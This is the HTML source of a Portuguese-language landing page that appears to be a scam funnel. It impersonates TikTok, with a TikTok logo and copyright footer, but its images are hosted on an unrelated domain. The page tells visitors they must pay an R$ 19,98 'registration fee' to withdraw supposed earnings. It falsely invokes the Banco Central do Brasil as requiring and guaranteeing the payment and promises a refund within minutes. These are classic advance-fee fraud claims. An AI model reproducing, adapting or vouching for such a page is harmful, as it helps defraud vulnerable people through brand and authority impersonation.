<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Taxa de Cadastro</title>
    <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            width: 100%;
            max-width: 400px;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: white;
            padding: 15px 10px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
            margin-bottom: 20px;
        }

        .header img {
            height: 40px;
            object-fit: contain;
        }

        .container {
            background-color: white;
            width: 100%;
            max-width: 400px;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        .verification-box {
            border-radius: 10px;
            margin-bottom: 20px;
        }

        .verification-box img {
            width: 100%;
            max-width: 350px;
            margin-bottom: 10px;
        }

        h1 {
            font-size: 18px;
            font-weight: bold;
            margin-bottom: 10px;
            color: #333;
        }

        p {
            font-size: 14px;
            color: #555;
            margin-bottom: 15px;
        }

        p strong {
            color: #333;
        }

        .info {
            text-align: left;
            margin-top: 20px;
        }

        .info-item {
            display: flex;
            align-items: center;
            margin-bottom: 15px;
        }

        .info-item svg {
            width: 48px;
            height: 48px;
            margin-right: 10px;
        }

        .info-item p {
            font-size: 14px;
            color: #555;
        }

        .info-item p strong {
            color: #333;
        }

        .separator {
            width: 100%;
            height: 1px;
            background-color: #ddd;
            margin: 20px 0;
        }

        .button-container {
            display: flex;
            justify-content: center;
        }

        .submit-button {
            background-color: #FE2B54;
            color: white;
            padding: 15px 30px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            transition: background-color 0.3s ease;
            text-decoration: none;
        }

        .submit-button:hover {
            background-color: #8b0000;
        }

        footer {
            font-size: 12px;
            color: #999;
            margin-top: 20px;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="https://appmultiplica.online/ttk/images/logo.svg
" alt="TikTok Logo">
    </div>

    <div class="container">
        <!-- Verification Section -->
        <div class="verification-box">
            <img src="https://appmultiplica.online/ttk/images/verified.svg
" alt="Verificação">
        </div>

        <!-- Title and Description -->
        <h1>Taxa de Cadastro</h1>
        <p>
            Seguindo as diretrizes do <strong>Banco Central do Brasil</strong>, solicitamos uma confirmação de identidade de <strong>R$ 19,98</strong> para garantir a autenticidade dos participantes.
        </p>
        <p>
            O dinheiro será totalmente reembolsado entre 1 a 5 minutos junto ao saldo acumulado.
        </p>

        <!-- Information Section -->
        <div class="info">
            <div class="info-item">
                <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" fill="none">
                    <rect width="48" height="48" rx="8" fill="#F1FBFA"></rect>
                    <g clip-path="url(#clip0_721_101)">
                        <path d="M24 20.45V24.45M25.246 15.4588L26.467 16.4993C26.7746 16.7614 27.1566 16.9199 27.5594 16.9521L29.1585 17.0795C30.0986 17.1545 30.8453 17.9008 30.9204 18.8409L31.0475 20.4402C31.0797 20.8431 31.2387 21.2256 31.5008 21.5332L32.5409 22.7538C33.1526 23.4716 33.1527 24.5275 32.541 25.2454L31.5009 26.4662C31.2388 26.7738 31.08 27.1564 31.0478 27.5593L30.9199 29.1583C30.8449 30.0984 30.0993 30.8452 29.1591 30.9202L27.5595 31.0478C27.1567 31.08 26.7744 31.2381 26.4667 31.5002L25.246 32.5407C24.5282 33.1525 23.4717 33.1526 22.7539 32.5409L21.5332 31.5003C21.2256 31.2382 20.8433 31.0798 20.4404 31.0477L18.8408 30.9202C17.9006 30.8452 17.1551 30.0986 17.08 29.1585L16.9521 27.5594C16.92 27.1565 16.7611 26.7742 16.499 26.4666L15.4589 25.2454C14.8472 24.5276 14.8469 23.472 15.4586 22.7542L16.4996 21.533C16.7618 21.2254 16.9191 20.8431 16.9512 20.4402L17.0792 18.8411C17.1542 17.901 17.9019 17.1544 18.842 17.0794L20.4399 16.952C20.8428 16.9198 21.2252 16.7615 21.5328 16.4993L22.754 15.4588C23.4718 14.8471 24.5282 14.8471 25.246 15.4588ZM24.0498 27.45V27.55L23.9501 27.5496V27.45H24.0498Z" stroke="#2B6563" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                    </g>
                    <defs>
                        <clipPath id="clip0_721_101">
                            <rect width="24" height="24" fill="white" transform="translate(12 12)">
                            </rect>
                        </clipPath>
                    </defs>
                </svg>
                <p><strong>Taxa obrigatória</strong><br>Obrigatório para realizar o saque dos seus ganhos.</p>
            </div>

            <div class="info-item">
                <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" fill="none">
                    <rect width="48" height="48" rx="8" fill="#F1FBFA"></rect>
                    <g clip-path="url(#clip0_357_143)">
                        <path d="M24 14.9999C28.9706 14.9999 33 19.0293 33 23.9999C33 28.9704 28.9706 32.9999 24 32.9999C19.0294 32.9999 15 28.9704 15 23.9999C15 21.1726 16.3037 18.6498 18.3427 16.9999" stroke="#2B6563" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M15 16.4999H19V20.4999" stroke="#2B6563" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                    </g>
                </svg>
                <p><strong>Valor reembolsável</strong><br>Você recebe os R$ 19,98 de volta após finalizar.</p>
            </div>

            <div class="info-item">
                <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" fill="none">
                    <rect width="48" height="48" rx="8" fill="#F1FBFA"></rect>
                    <g clip-path="url(#clip0_357_162)">
                        <path d="M17.6061 17.7403L24 15L30.3939 17.7403C30.7616 17.8978 31 18.2594 31 18.6594V25.5181C31 27.6712 29.8463 29.6593 27.9768 30.7275L24 33L20.0232 30.7275C18.1537 29.6593 17 27.6712 17 25.5181V18.6594C17 18.2594 17.2384 17.8978 17.6061 17.7403Z" stroke="#2B6563" stroke-width="2" stroke-linejoin="round"></path>
                        <path d="M27 22L23 26L21 24" stroke="#2B6563" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                    </g>
                </svg>
                <p><strong>Garantia de segurança</strong><br>Seu pagamento é seguro e protegido por <strong>Banco Central do Brasil</strong>.</p>
            </div>
        </div>

        <!-- Separator and Button -->
        <div class="separator"></div>
        <div class="button-container">
            <a href="../vsl" class="submit-button">Realizar Saque</a>
        </div>

        <!-- Footer -->
        <footer>
            © 2024 TikTok - Todos os direitos reservados.
        </footer>
    </div>
</body>
</html>
